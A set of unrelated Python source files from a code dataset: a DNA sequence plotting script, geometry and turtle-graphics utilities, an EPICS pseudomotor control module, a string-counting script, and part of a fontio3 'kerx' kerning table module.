__repr__(self):\r\n\t\t#print('[' + self.x + ', ' + self.y + ', ' + self.z + ']')\r\n\t\t#return('[' + str(self.x) + ', ' + str(self.y) + ', ' + str(self.z) + ']')\r\n\t\t#return('[' + str(round(self.x, 4)) + ', ' + str(round(self.y, 4)) + ', ' + str(round(self.z, 4)) + ']')\r\n\t\treturn('[' + str(round(self.x, 3)) + ', ' + str(round(self.y, 3)) + ', ' + str(round(self.z, 3)) + ']')\r\n\t\t\r\n\tdef modulus(self):\r\n\t\treturn sqrt(pow(self.x, 2) + pow(self.y, 2) + pow(self.z, 2))\r\n\t\t\r\n\tdef unit(self):\r\n\t\tmod = self.modulus()\r\n\t\tif(mod > 0):\r\n\t\t\tunit_x = self.x / mod\r\n\t\t\tunit_y = self.y / mod\r\n\t\t\tunit_z = self.z / mod\r\n\t\t\treturn ThreeDVector(unit_x, unit_y, unit_z)\r\n\t\telse:\r\n\t\t\treturn ThreeDVector(0, 0, 0)\r\n\t\t\t\r\n\tdef add(self, point_from):\r\n\t\tif(isinstance(point_from, ThreeDVector)):\r\n\t\t\treturn ThreeDVector((self.x + point_from.x), (self.y + point_from.y), (self.z + point_from.z))\r\n\t\telse:\r\n\t\t\treturn None\r\n\t\t\r\n\tdef unit_couplet_value(self, to):\r\n\t\tif(isinstance(to, ThreeDVector)):\r\n\t\t\tmidpoint = ThreeDVector(((self.x + to.x)/2), ((self.y + to.y)/2), ((self.z + to.z)/2))\r\n\t\t\treturn 
midpoint.unit()\r\n\t\telse:\r\n\t\t\t#print(\"Unable to compute the distance\")\r\n\t\t\treturn None\r\n\t\t\t#return ThreeDVector(0, 0, 0)\r\n\t\t'''if(isinstance(to, ThreeDVector)):\r\n\t\t\tmidpoint = ThreeDVector(((self.x + 0)/2), ((self.y + 0)/2), ((self.z + 0)/2))\r\n\t\t\treturn midpoint.unit()'''\r\n\r\nclass BasePosition:\r\n\tdef __init__(self):\r\n\t\tself.O = ThreeDVector(0, 0, 0)\t\t\r\n\t\tself.A = ThreeDVector(1, 1, 1)\r\n\t\tself.C = ThreeDVector(-1, -1, 1)\r\n\t\tself.G = ThreeDVector(1, -1, -1)\r\n\t\tself.T = ThreeDVector(-1, 1, -1)\r\n\r\nbasepos = BasePosition()\t\t\r\n\r\n'''doubledict = multi_key_dict()\r\ndoubledict['AA'] = A.unit_couplet_value(A)\r\ndoubledict['AC', 'CA'] = A.unit_couplet_value(C)\r\ndoubledict['AG', 'GA'] = A.unit_couplet_value(G)\r\ndoubledict['AT', 'TA'] = A.unit_couplet_value(T)\r\ndoubledict['CC'] = C.unit_couplet_value(C)\r\ndoubledict['CG', 'GC'] = C.unit_couplet_value(G)\r\ndoubledict['CT', 'TC'] = C.unit_couplet_value(T)\r\ndoubledict['GG'] = G.unit_couplet_value(G)\r\ndoubledict['GT', 'TG'] = G.unit_couplet_value(T)\r\ndoubledict['TT'] = T.unit_couplet_value(T)'''\r\n\r\ndoubledict = multi_key_dict()\r\ndoubledict['AA'] = basepos.A.unit_couplet_value(basepos.A)\r\ndoubledict['AC', 'CA'] = basepos.A.unit_couplet_value(basepos.C)\r\ndoubledict['AG', 'GA'] = basepos.A.unit_couplet_value(basepos.G)\r\ndoubledict['AT', 'TA'] = basepos.A.unit_couplet_value(basepos.T)\r\ndoubledict['CC'] = basepos.C.unit_couplet_value(basepos.C)\r\ndoubledict['CG', 'GC'] = basepos.C.unit_couplet_value(basepos.G)\r\ndoubledict['CT', 'TC'] = basepos.C.unit_couplet_value(basepos.T)\r\ndoubledict['GG'] = basepos.G.unit_couplet_value(basepos.G)\r\ndoubledict['GT', 'TG'] = basepos.G.unit_couplet_value(basepos.T)\r\ndoubledict['TT'] = basepos.T.unit_couplet_value(basepos.T)\r\n\r\n\r\ndef lifeizhaoyuplot(fname):\r\n\tseqlen = getseqlen(fname)\r\n\t#print(seqlen)\r\n\tseqarr = []\r\n\tf = open(fname, 'r')\r\n\tc = f.read(1)\r\n\twhile c!=\"\":\r\n\t\tc = c.upper()\r\n\t\tif(c in baseset):\r\n\t\t\t#x = Node(c)\r\n\t\t\tseqarr.append(Node(c))\r\n\t\tc = f.read(1)\r\n\tf.close()\r\n\t\r\n\tstart_time = datetime.datetime.now()\r\n\t\r\n\tpoint = basepos.O\r\n\tcount = 0\r\n\twhile(count < seqlen-1):\r\n\t\tword = seqarr[count].base + seqarr[count+1].base\r\n\t\t#print(count)\r\n\t\t#print(word)\r\n\t\t#(doubledict[word])\r\n\t\t#point = point.unit_couplet_value(doubledict[word])\r\n\t\t#point = doubledict[word].unit_couplet_value(point)\r\n\t\tpoint = doubledict[word].add(point)\r\n\t\t#print(point)\r\n\t\tcount += 1\r\n\t#print(count)\r\n\tprint(point)\r\n\t\r\n\tend_time = datetime.datetime.now()\r\n\ttime_taken = end_time - start_time\r\n\t\r\n\tprint('time taken = ' + str(time_taken.microseconds))\r\n\tprint('time taken = ' + str(time_taken.seconds))\r\n","sub_path":"sequence_extract_genomes_IC/all/lifeizhaoyuplot.py","file_name":"lifeizhaoyuplot.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"4563890","text":"import csv\r\nimport math\r\n\r\nclass Point:\r\n def __init__(self, x, y):\r\n self.x = x\r\n self.y = y\r\n \r\ndef create_point():\r\n return Point(random(width/8,width-width/8),random(height/8,height-height/8))\r\n\r\ndef print_pretty(list):\r\n \"\"\"\r\n Method to help in debugging\r\n \"\"\"\r\n for point in list:\r\n print(\"(\" + str(point.x)+ \", \" + str(point.y) + \")\")\r\n\r\n\r\ndef polar_angle(p1, p2):\r\n y = p2.y - p1.y\r\n x = p2.x - p1.x\r\n 
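    # math.atan2(y, x) resolves the correct quadrant for the angle from p1 to p2 and,\r\n    # unlike atan(y / x), is safe when x == 0; e.g. with the Point class above,\r\n    # polar_angle(Point(0, 0), Point(-1, 1)) returns 135.0.\r\n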
ret = math.degrees(math.atan2(y,x))\r\n return ret\r\n\r\ndef distance(origin,p):\r\n AC = abs(origin.x - p.x)\r\n BC = abs(origin.y - p.y)\r\n AB = math.sqrt(pow(AC,2) + pow(BC,2))\r\n return AB\r\n\r\ndef is_left_turn(hull, p1, p2):\r\n m = ((p2.y-hull.y) * (p1.x - hull.x))\r\n n = ((p1.y - hull.y) * (p2.x - hull.x))\r\n if(m == n):\r\n # if points are collinear select furthest point\r\n if distance(hull, p1) >= distance(hull,p2):\r\n return True\r\n else:\r\n return False\r\n if(m < n):\r\n return True\r\n else:\r\n return False\r\n\r\ndef get_lowest_point(point_list):\r\n \"\"\"\r\n :param list: of points\r\n :return: lowest point on the coordinate system\r\n furthest left if there is a tie\r\n \"\"\"\r\n lowest_p = point_list[0]\r\n for p in point_list:\r\n if p.y < lowest_p.y:\r\n lowest_p = p\r\n if p.y == lowest_p.y:\r\n if p.x < lowest_p.x:\r\n lowest_p = p\r\n return lowest_p\r\n\r\ndef make_minhull_list(length, center=(0,0),height=500):\r\n \"\"\"\r\n My hacky way in create a triangle with points within in\r\n :param length: size of list to create\r\n :param center: center coordinate to build right angle\r\n :param height: height of triangle to create\r\n :return:\r\n \"\"\"\r\n center_x, center_y = center\r\n a = Point(center_x, center_y)\r\n b = Point(center_x, center_y + height)\r\n c = Point(center_y + height, center_x)\r\n list = [a,b,c]\r\n for i in range(0,length):\r\n p = create_point(center_x+1, center_y+height-1)\r\n while(polar_angle(c, b) >= polar_angle(c, p)):\r\n p = create_point(center_x+1, center_y+height-1)\r\n list.append(p)\r\n return list\r\n","sub_path":"Point Generator Applications/application.linux32/source/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"583809937","text":"from turtle import *\n\nglobal a\na = 100\n\n\ndef czworokąt(kąt_a, kąt_b, kolor):\n fillcolor(kolor)\n begin_fill()\n for i in range(2):\n fd(a)\n rt(kąt_a)\n fd(a)\n rt(kąt_b)\n end_fill()\n\n\ndef dojscie():\n setheading(0)\n fd(a)\n rt(60)\n fd(a)\n\n\ndef marihuaina():\n pu()\n setpos(0, 200)\n dojscie()\n pd()\n for i in range(5):\n czworokąt(30, 150, \"darkgreen\")\n rt(30)\n\n\ndef zielone_romby():\n pu()\n setpos(0, 200)\n for i in range(4):\n pu()\n setpos(0, 200)\n dojscie()\n setheading(210 - 60 + 30 * i)\n fd(a)\n lt(30)\n fd(a)\n lt(90)\n pd()\n lt(60)\n pd()\n czworokąt(120, 60, \"yellowgreen\")\n\n\ndef zolte_kwadraty():\n for i in range(3):\n pu()\n setpos(0, 200)\n dojscie()\n setheading(210 - 60 + 30 * i)\n fd(a)\n for i in range(2):\n lt(30)\n fd(a)\n lt(120)\n pd()\n czworokąt(90, 90, \"yellow\")\n\n\ndef pomaranczowe_romby():\n pu()\n for i in range(2):\n setpos(0, 200)\n\n dojscie()\n setheading(210 - 60 + 30 * i)\n for i in range(4):\n fd(a)\n lt(30)\n lt(60)\n pd()\n czworokąt(60, 120, \"orange\")\n pu()\n\n\ndef czerwony_romb():\n rt(60)\n pd()\n czworokąt(150, 30, \"red\")\n\n\ndef owoc():\n marihuaina()\n zielone_romby()\n zolte_kwadraty()\n pomaranczowe_romby()\n czerwony_romb()\n\n\nowoc()\npu()\n\ndone()\n","sub_path":"konkursy/15_2016/15_2/owoc.py","file_name":"owoc.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"382522577","text":"# -*- coding: utf-8 -*-\n# vi:sw=4 ts=4\n\"\"\"\n:mod:`ecli_cas.pseudomotor` -- pseudomotor support\n==================================================\n\n.. 
module:: ecli_pseudomotor\n :synopsis: ECLI pseudomotor support\n.. moduleauthor:: Ken Lauer \n\"\"\"\nfrom __future__ import print_function\nimport logging\nimport math\nimport copy\n\nimport epics\nimport ast\n\nfrom . import SoftMotor\nfrom . import motor_info as mi\nfrom . import CAPV\n\n\nlogger = logging.getLogger('ECLI.pseudomotor')\n\n\nclass MotorGroup(object):\n \"\"\"\n Holds a set of inter-related equations and their\n corresponding motor/pseudomotor records\n \"\"\"\n def __init__(self, globals=None, aliases={}):\n self.variables = {}\n self._globals = globals\n self._validated = False\n self._records_set = False\n self._aliases = copy.deepcopy(aliases)\n\n if globals is None:\n self._globals = self._build_globals()\n for fcn in ('sin', 'asin', 'cos', 'acos', 'tan', 'atan', 'atan2', 'pi', 'pow'):\n self._globals[fcn] = getattr(math, fcn)\n\n def start(self):\n for name, record in self.records:\n if isinstance(record, PseudoMotor):\n record.startup()\n\n @property\n def validated(self):\n return self._validated\n\n def _build_globals(self, allowed_modules=['numpy', 'math', '__builtins__']):\n return dict((module, globals()[module]) for module in allowed_modules\n if module in globals())\n\n def add_pv(self, variable, pv_name, pv_instance=None, equation=None):\n if pv_instance is not None and not isinstance(pv_instance, epics.PV):\n raise TypeError('Expected epics.PV, got %s' % (pv_instance.__class__.__name__))\n elif variable in self.variables:\n raise KeyError('Variable already exists: %s' % variable)\n\n if equation is None:\n equation = variable\n\n if pv_instance is None:\n pv_instance = epics.PV(pv_name)\n\n self.variables[variable] = {'full_pv': pv_name,\n 'equation': equation,\n 'record': pv_instance,\n 'related': set(),\n 'last_value': 0.0,\n }\n\n self._validated = False\n\n def add_motor(self, variable, record, equation=None):\n if variable in self.variables:\n raise KeyError('Variable already exists: %s' % variable)\n\n if equation is None:\n equation = variable\n\n self.variables[variable] = {'full_pv': record,\n 'equation': equation,\n 'record': None,\n 'related': set(),\n 'last_value': 0.0,\n }\n\n self._validated = False\n self._records_set = False\n\n def _link_variables(self, v1, v2):\n self.variables[v1]['related'].add(v2)\n self.variables[v2]['related'].add(v1)\n\n def _validate_equation(self, variable, eq):\n root = ast.parse(eq)\n identifiers = set([node.id for node in ast.walk(root)\n if isinstance(node, ast.Name)])\n\n for ident in identifiers:\n if ident in self.variables:\n self._link_variables(variable, ident)\n elif ident in self._globals:\n pass\n else:\n if ident in self._aliases:\n pv_name = self._aliases[ident]\n self.add_pv(ident, pv_name)\n\n self._link_variables(variable, ident)\n else:\n raise ValueError('Unknown identifier %s' % ident)\n\n return eq\n\n def get_equation(self, variable):\n return self.variables[variable]['equation']\n\n def check_equations(self):\n if self._validated:\n return True\n\n for variable in self.variables.keys():\n eq = self.get_equation(variable)\n self._validate_equation(variable, eq)\n\n self._validated = True\n return self._validated\n\n def check_records(self):\n if self._records_set:\n return True\n\n records = [rec for var, rec in self.records]\n\n self._records_set = (None not in records)\n return self._records_set\n\n def get_record(self, variable):\n return self.variables[variable]['record']\n\n def set_record(self, variable, record):\n self.variables[variable]['record'] = record\n\n def 
get_related_records(self, variable):\n return [(var, self.variables[var]['record'])\n for var in self.variables[variable]['related']]\n\n @property\n def records(self):\n for variable, info in self.variables.items():\n yield variable, info['record']\n\n def variable_dict(self):\n if not self.check_records():\n raise Exception('Not all record instances set')\n\n ret = {}\n for variable, record in self.records:\n if isinstance(record, PseudoMotor):\n if record._rotary:\n ret[variable] = record.request_position * math.pi / 180.0\n else:\n ret[variable] = record.request_position\n elif isinstance(record, epics.Motor):\n ret[variable] = record.get_position(readback=True)\n else:\n value = record.get()\n if value is None:\n value = 0.0\n\n ret[variable] = value\n\n return ret\n\n def evaluate(self, variable, locals_=None):\n if not self._validated:\n self.check_equations()\n\n if not self.check_records():\n raise Exception('Not all record instances set')\n\n if locals_ is None:\n locals_ = self.variable_dict()\n\n entry = self.variables[variable]\n eq = self.get_equation(variable)\n\n try:\n ret = eval(eq, self._globals, locals_)\n except:\n logger.debug('Unable to calculate new position (expression= %s)' % eq,\n exc_info=True)\n else:\n record = entry['record']\n if isinstance(record, PseudoMotor) and record._rotary:\n entry['last_value'] = ret * 180.0 / math.pi\n else:\n entry['last_value'] = ret\n\n return entry['last_value']\n\n def evaluate_related(self, variable):\n info = self.variables[variable]\n\n ret = {}\n for related in info['related']:\n ret[related] = self.evaluate(related)\n\n return ret\n\n\nclass PseudoMotor(SoftMotor):\n _globals = None\n\n def __init__(self, manager, group, alias, record_name,\n readback_calc=None, rotary=False, desc=''):\n \"\"\"\n :param manager: the CAS PV manager\n :param alias: alias\n :param record_name: pseudomotor record name\n :param readback_calc: equation used to update readback value\n e.g., (m1 + m2) would sum readbacks from m1 and m2,\n making the readback for this pseudomotor. If unset,\n uses the all_motor database\n \"\"\"\n logger.debug('Pseudo motor: %s = %s' % (record_name, readback_calc))\n\n self.group = group\n if not self.group.validated:\n self.group.check_equations()\n\n self.group.set_record(alias, self)\n\n SoftMotor.__init__(self, manager, record_name)\n\n self._related_motors = None\n self._related_pvs = None\n self._readback_calc = self.group.get_equation(alias)\n self._waiting = set()\n self._rotary = rotary\n self._alias = alias\n self._records = {}\n\n if not desc:\n desc = alias\n self.put('DESC', desc)\n\n def startup(self):\n for name, info in self.related_motors.items():\n rec = info['record']\n if isinstance(rec, epics.Motor):\n rec.set_callback(mi.MOTOR_USER_READBACK,\n lambda **kwargs: self.update_readback())\n rec.set_callback(mi.MOTOR_DONE_MOVE,\n lambda motor=name, **kwargs:\n self.related_finished(motor, **kwargs))\n\n for pvi in self.related_pvs:\n pvi.add_callback(callback=lambda **kwargs: self.update_readback())\n\n self.calculate_range()\n\n def shutdown(self):\n # TODO note that this just clears all callbacks for related\n # records. 
could easily remove the specific one if lambdas\n # aren't used.\n for name, info in self.related_motors.items():\n rec = info['record']\n if isinstance(rec, epics.Motor):\n rec.clear_callback(mi.MOTOR_USER_READBACK)\n rec.clear_callback(mi.MOTOR_DONE_MOVE)\n else:\n rec.clear_callbacks()\n\n # Remove all fields\n self.remove_all()\n\n def calculate_range(self):\n \"\"\"\n Assuming that limits of all real motors may give minimal/maximal positions\n for the pseudomotor, iterate through the combinations and set rough\n pseudomotor limits.\n \"\"\"\n mins = {}\n maxes = {}\n\n for name, info in self.related_motors.items():\n rec = info['record']\n low_limit = getattr(rec, mi.MOTOR_USER_LOW_LIMIT)\n high_limit = getattr(rec, mi.MOTOR_USER_HIGH_LIMIT)\n mins[name] = low_limit\n maxes[name] = high_limit\n\n logger.debug('Motor %s low: %s high: %s' %\n (name, low_limit, high_limit))\n\n real_positions = self.group.variable_dict()\n iterations = 2 ** len(self.related_motors)\n\n alias = self._alias\n i = 0\n\n while i < iterations:\n j = 1\n for name, info in self.related_motors.items():\n if (i & j) == 0:\n real_positions[name] = mins[name]\n else:\n real_positions[name] = maxes[name]\n\n j *= 2\n\n readback = self.group.evaluate(self._alias, locals_=real_positions)\n if alias not in mins or mins[alias] > readback:\n mins[alias] = readback\n\n if alias not in maxes or maxes[alias] < readback:\n maxes[alias] = readback\n\n i += 1\n\n if alias in mins:\n self.user_low_limit_updated(mins[alias])\n logger.debug('Set pseudomotor low limit %s: %s' %\n (alias, mins[alias]))\n\n if alias in maxes:\n self.user_high_limit_updated(maxes[name])\n logger.debug('Set pseudomotor high limit %s: %s' %\n (alias, maxes[alias]))\n\n @property\n def related_motors(self):\n def make_entry(name, record):\n return {'record': record,\n 'finished': record.get(mi.MOTOR_DONE_MOVE),\n }\n\n if self._related_motors is None:\n records = self.group.get_related_records(self._alias)\n motors = dict([(name, make_entry(name, record)) for name, record in records\n if isinstance(record, epics.Motor)])\n\n self._related_motors = motors\n\n return self._related_motors\n\n @property\n def related_pvs(self):\n if self._related_pvs is None:\n records = self.group.get_related_records(self._alias)\n pvs = [record for name, record in records\n if isinstance(record, epics.PV)]\n\n self._related_pvs = pvs\n\n return self._related_pvs\n\n def go_updated(self, value=None, **kwargs):\n # If stop/pause/go is pressed, notify all related motors\n SoftMotor.go_updated(self, value)\n\n for name, info in self.related_motors.items():\n record = info['record']\n record.put(mi.MOTOR_GO, value)\n\n def move(self, amount, relative=False, asyn=None, **kwargs):\n # Asyn PVs can get 2 callbacks when an asyn context is created (e.g.,\n # with caput -c) -- one to check the value, then one when processing\n # should start. 
This allows pcaspy to accept the value and start\n # the asynchronous task on the context\n if asyn in (CAPV.ASYN_OFF, CAPV.ASYN_CHECK):\n if relative:\n pos = self._readback + amount\n else:\n pos = amount\n\n logger.debug('Pseudo move %s to %s' % (self, pos))\n try:\n ret = SoftMotor.move(self, pos, relative=False)\n except SoftMotor.SoftMotorError:\n return False\n except:\n logger.debug('Pseudo move %s failed' % (self, ),\n exc_info=True)\n return False\n else:\n if asyn == CAPV.ASYN_CHECK:\n return ret\n\n else:\n pos = self.request_position\n logger.debug('Pseudo asyn move started (%s)' % (self, ))\n\n def put_complete(motor):\n logger.debug('Put complete: %s' % motor)\n\n if motor in self._waiting:\n self._waiting.remove(motor)\n\n if not self._waiting:\n self.done_moving = True\n\n self.done_moving = False\n\n new_positions = self.group.evaluate_related(self._alias)\n for motor, new_pos in new_positions.items():\n record = self.group.get_record(motor)\n\n logger.debug('Setting %s %g' % (record, new_pos))\n if isinstance(record, epics.PV):\n pvi = record\n else:\n user_pv = '%s' % (record._prefix, )\n\n # TODO shouldn't be re-creating PV instances\n pvi = epics.PV(user_pv)\n\n self._waiting.add(pvi)\n\n pvi.put(new_pos, timeout=None,\n callback=lambda motor=motor, pvi=pvi, **kwargs: put_complete(pvi))\n\n if not self._waiting and not self.done_moving:\n self.done_moving = True\n\n def update_readback(self):\n readback = self.group.evaluate(self._alias)\n self._set_readback(readback)\n\n def related_finished(self, motor_name, value=None, **kwargs):\n entry = self._related_motors[motor_name]\n entry['finished'] = (value != 0)\n\n done = all(entry['finished'] for name, entry in self.related_motors.items())\n if done != self.done_moving:\n self.done_moving = done\n\n\ndef _test():\n group = MotorGroup()\n group.add_motor('m1', 'IOC:m1', '0.5 * pseudo1')\n group.add_motor('m2', 'IOC:m2', '0.6 * pseudo1')\n group.add_motor('pseudo1', 'ECLI:test', '2.0 * m1')\n #group.check_equations()\n\n from . 
import PVManager\n import epics\n\n manager = PVManager('ECLI:')\n manager.run()\n\n group.set_record('m1', epics.Motor('IOC:m1'))\n group.set_record('m2', epics.Motor('IOC:m2'))\n pseudo = PseudoMotor(manager, group, 'pseudo1', 'test')\n\n group.start()\n\n pseudo.update_readback()\n print('calculated rbv is', epics.caget('ECLI:test.RBV'))\n\n print(epics.caget('ECLI:test.VAL'), pseudo)\n import time\n try:\n time.sleep(60)\n except KeyboardInterrupt:\n pass\n\n print('Move done')\n\n print('pseudo rbv', epics.caget('ECLI:test.RBV'))\n print('m1 rbv', epics.caget('IOC:m1.RBV'))\n print('m2 rbv', epics.caget('IOC:m2.RBV'))\n","sub_path":"ecli_cas/pseudomotor.py","file_name":"pseudomotor.py","file_ext":"py","file_size_in_byte":15521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"505522843","text":"import sys\n\nprint('string is:', sys.argv[1])\ns = sys.argv[1]\n\npath_to = '/Users/amitmshah/Downloads/advanti_files'\n\ndef check_text(ck):\n samp1_cnt = open('{}/sample1.txt'.format(path_to), 'r').read().count(ck)\n samp2_cnt = open('{}/sample2.txt'.format(path_to), 'r').read().count(ck)\n samp3_cnt = open('{}/sample3.txt'.format(path_to), 'r').read().count(ck)\n print('File sample1.txt contains {} instances of \"{}\".'.format(samp1_cnt, ck))\n print('File sample2.txt contains {} instances of \"{}\".'.format(samp2_cnt, ck))\n print('File sample3.txt contains {} instances of \"{}\".'.format(samp3_cnt, ck))\n\n\nif __name__ == '__main__':\n check_text(s)\n","sub_path":"numOfStrInFile.py","file_name":"numOfStrInFile.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"398135980","text":"#\n# kerx.py\n#\n# Copyright © 2011-2013, 2016 Monotype Imaging Inc. All Rights Reserved.\n#\n\n\"\"\"\nSupport for 'kerx' tables.\n\"\"\"\n\n# System imports\nimport logging\nimport operator\n\n# Other imports\nfrom fontio3.fontdata import seqmeta\n\nfrom fontio3.kerx import (\n coverage,\n format0,\n format1,\n format2,\n format3,\n format4,\n gposconverter)\n\nfrom fontio3.statetables.subtable_glyph_coverage_sets import \\\n SubTableGlyphCoverageSets\n\n# -----------------------------------------------------------------------------\n\n#\n# Private constants\n#\n\n_makers = {\n 0: format0.Format0.fromwalker,\n 1: format1.Format1.fromwalker,\n 2: format2.Format2.fromwalker,\n 3: format3.Format3.fromwalker,\n 4: format4.Format4.fromwalker}\n\n_makers_validated = {\n 0: format0.Format0.fromvalidatedwalker,\n 1: format1.Format1.fromvalidatedwalker,\n 2: format2.Format2.fromvalidatedwalker,\n # 3: format3.Format3.fromvalidatedwalker,\n 4: format4.Format4.fromvalidatedwalker}\n\n# -----------------------------------------------------------------------------\n\n#\n# Classes\n#\n\nclass Kerx(list, metaclass=seqmeta.FontDataMetaclass):\n \"\"\"\n Objects representing entire 'kerx' tables. 
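# The 'kerx' module above routes each subtable to its constructor through
# the _makers dict keyed on the format number. A self-contained sketch of
# that dispatch-table pattern; the parser names and payloads here are
# hypothetical, not the fontio3 API.
def parse_format0(payload):
    # stand-in for a format-0 subtable constructor
    return ('pairs', payload)

def parse_format2(payload):
    # stand-in for a format-2 subtable constructor
    return ('classes', payload)

PARSERS = {0: parse_format0, 2: parse_format2}

def parse_subtable(fmt, payload):
    try:
        return PARSERS[fmt](payload)
    except KeyError:
        raise ValueError("Unknown subtable format: %d" % fmt)

if __name__ == '__main__':
    print(parse_subtable(0, b'\x00\x0e\x00\x17'))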
These are lists of individual\n kerning subtable objects (Format0, Format1, etc.)\n \n >>> _testingValues[1].pprint()\n Subtable #1 (format 0):\n GlyphPair((14, 23)): -25\n GlyphPair((14, 96)): -30\n GlyphPair((18, 38)): 12\n Header information:\n Horizontal\n With-stream\n No variation kerning\n Process forward\n \n >>> _testingValues[1].pprint(namer=namer.testingNamer())\n Subtable #1 (format 0):\n (xyz15, afii60001): -30\n (xyz15, xyz24): -25\n (xyz19, xyz39): 12\n Header information:\n Horizontal\n With-stream\n No variation kerning\n Process forward\n \n >>> _testingValues[2].pprint()\n Subtable #1 (format 2):\n ClassPair((1, 1)): -25\n ClassPair((1, 2)): -10\n ClassPair((2, 1)): 15\n Left-hand classes:\n 15: 1\n 25: 1\n 35: 2\n Right-hand classes:\n 9: 1\n 12: 1\n 15: 1\n 40: 2\n Header information:\n Horizontal\n With-stream\n No variation kerning\n Process forward\n \"\"\"\n \n #\n # Class definition variables\n #\n \n seqSpec = dict(\n item_followsprotocol = True,\n item_pprintlabelfunc = (\n lambda i, obj: \"Subtable #%d (format %d)\" % (i + 1, obj.format)),\n item_pprintlabelfuncneedsobj = True,\n seq_compactremovesfalses = True)\n\n attrSpec = dict(\n preferredVersion = dict(\n attr_ignoreforcomparisons = True,\n attr_initfunc = (lambda: None),\n attr_showonlyiftrue = True,\n attr_pprintfunc = (lambda p,x,label,**k: p.simple(hex(x), label=label)),\n attr_wisdom = (\"Preferred version when writing. Initially \"\n \"set to the same as originalVersion; override by setting \"\n \"a format number or set to None to allow fontio3 to \"\n \"analyze and write what it thinks is best for the content.\")),\n\n originalVersion = dict(\n attr_ignoreforcomparisons = True,\n attr_initfunc = (lambda: None),\n attr_showonlyiftrue = True,\n attr_pprintfunc = (lambda p,x,label,**k: p.simple(hex(x), label=label)),\n attr_wisdom = \"Original version when read\"))\n\n attrSorted = ('preferredVersion', 'originalVersion')\n\n #\n # Methods\n #\n \n def buildBinary(self, w, **kwArgs):\n \"\"\"\n Adds the binary data for the Kerx object to the specified LinkedWriter.\n The keyword arguments are:\n \n addSentinel Set to True to cause (where appropriate) subtables\n to have the (0xFFFF, 0xFFFF, 0) sentinel added at\n the end (note this does not affect the subtable's\n count of numPairs or whatever).\n \n stakeValue The stake value to be used at the start of this\n output.\n\n >>> h = utilities.hexdump\n >>> obj = _testingValues[1]\n >>> h(obj.binaryString())\n 0 | 0002 0000 0000 0001 0000 002E 0000 0000 |................|\n 10 | 0000 0000 0000 0003 0000 000C 0000 0001 |................|\n 20 | 0000 0006 000E 0017 FFE7 000E 0060 FFE2 |.............`..|\n 30 | 0012 0026 000C |...&.. |\n >>> h(obj.binaryString(addSentinel=True))\n 0 | 0002 0000 0000 0001 0000 0034 0000 0000 |...........4....|\n 10 | 0000 0000 0000 0003 0000 000C 0000 0001 |................|\n 20 | 0000 0006 000E 0017 FFE7 000E 0060 FFE2 |.............`..|\n 30 | 0012 0026 000C FFFF FFFF 0000 |...&........ 
|\n \"\"\"\n \n if 'stakeValue' in kwArgs:\n stakeValue = kwArgs.pop('stakeValue')\n w.stakeCurrentWithValue(stakeValue)\n else:\n stakeValue = w.stakeCurrent()\n \n version = 0x00020000 # default to version 2\n if self.preferredVersion:\n # check if caller prefers a specific version\n if self.preferredVersion in {0x00020000, 0x00030000}:\n version = self.preferredVersion\n else:\n raise ValueError(\"Unknown preferredVersion (0x%08X), expected 0x00020000 or 0x00030000\" % (self.preferredVersion,))\n else:\n # use version 3 if there are any non-empty coverage sets\n for subtable in self:\n if subtable.glyphCoverageSet:\n version = 0x00030000\n break\n w.add(\"2L\", version, len(self))\n\n for subtable in self:\n startLength = w.byteLength\n lengthStake = w.addDeferredValue(\"L\")\n subtable.coverage.buildBinary(w)\n w.add(\"BL\", subtable.format, (subtable.tupleIndex or 0))\n subtable.buildBinary(w, **kwArgs)\n \n w.setDeferredValue(\n lengthStake,\n \"L\",\n int(w.byteLength - startLength))\n\n if version == 0x00030000:\n glyphCoverageSets = SubTableGlyphCoverageSets(\n [subtable.glyphCoverageSet for subtable in self])\n glyphCoverageSets.buildBinary(w, isKerx=True, **kwArgs)\n\n @classmethod\n def fromGPOS(cls, gposObj, scriptTag, **kwArgs):\n \"\"\"\n Creates and returns a new Kerx object from the specified GPOS object\n for the specified script. The Lookup order will be preserved as the\n subtable order in the new Kerx object.\n \n The following keyword arguments are supported:\n \n backMap If a dict is passed in as this keyword argument, it\n will be filled with a mapping from GPOS feature tag to\n sets of Kerx indices.\n \n langSys A 4-byte bytestring representing the langSys to be\n converted in the specified script. If this value is not\n specified, the defaultLangSys will be used; if the\n specified script does not have any features in the\n defaultLangSys then an empty Kerx object will be\n returned.\n \n ### gposObj = _makeGPOS()\n ### gposObj.pprint()\n Features:\n Feature 'kern0001':\n Lookup 0:\n Subtable 0 (Pair (glyph) positioning table):\n Key((15, 32)):\n Second adjustment:\n FUnit adjustment to origin's x-coordinate: -18\n Key((20, 30)):\n Second adjustment:\n FUnit adjustment to origin's x-coordinate: 14\n Lookup flags:\n Right-to-left for Cursive: False\n Ignore base glyphs: False\n Ignore ligatures: False\n Ignore marks: False\n Sequence order (lower happens first): 0\n Scripts:\n Script object latn:\n Default LangSys object:\n Optional feature tags:\n kern0001\n \n ### e = utilities.fakeEditor(0x100)\n ### k = Kerx.fromGPOS(gposObj, b'latn', editor=e)\n ### k.pprint()\n Subtable #1 (format 0):\n GlyphPair((15, 32)): -18\n GlyphPair((20, 30)): 14\n Header information:\n Horizontal\n With-stream\n No variation kerning\n Process forward\n \"\"\"\n \n r = cls()\n \n if scriptTag not in gposObj.scripts:\n return r\n \n lsdObj = gposObj.scripts[scriptTag]\n ls = kwArgs.pop('langSys', None)\n \n if ls is None:\n lsObj = lsdObj.defaultLangSys\n elif ls in lsdObj:\n lsObj = lsdObj[ls]\n else:\n return r\n \n if lsObj.requiredFeature:\n allFeats = {lsObj.requiredFeature}\n else:\n allFeats = set(lsObj.optionalFeatures)\n \n # At this point we have all the needed feature tags. 
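# The conversion below orders (featureTag, lookupIndex) keys by their Lookup
# sequence number before emitting subtables. A minimal sketch of that
# ordering step with operator.itemgetter(1); the dict contents are made up.
import operator

order = {(b'kern', 0): 2, (b'kern', 1): 0, (b'dist', 0): 1}
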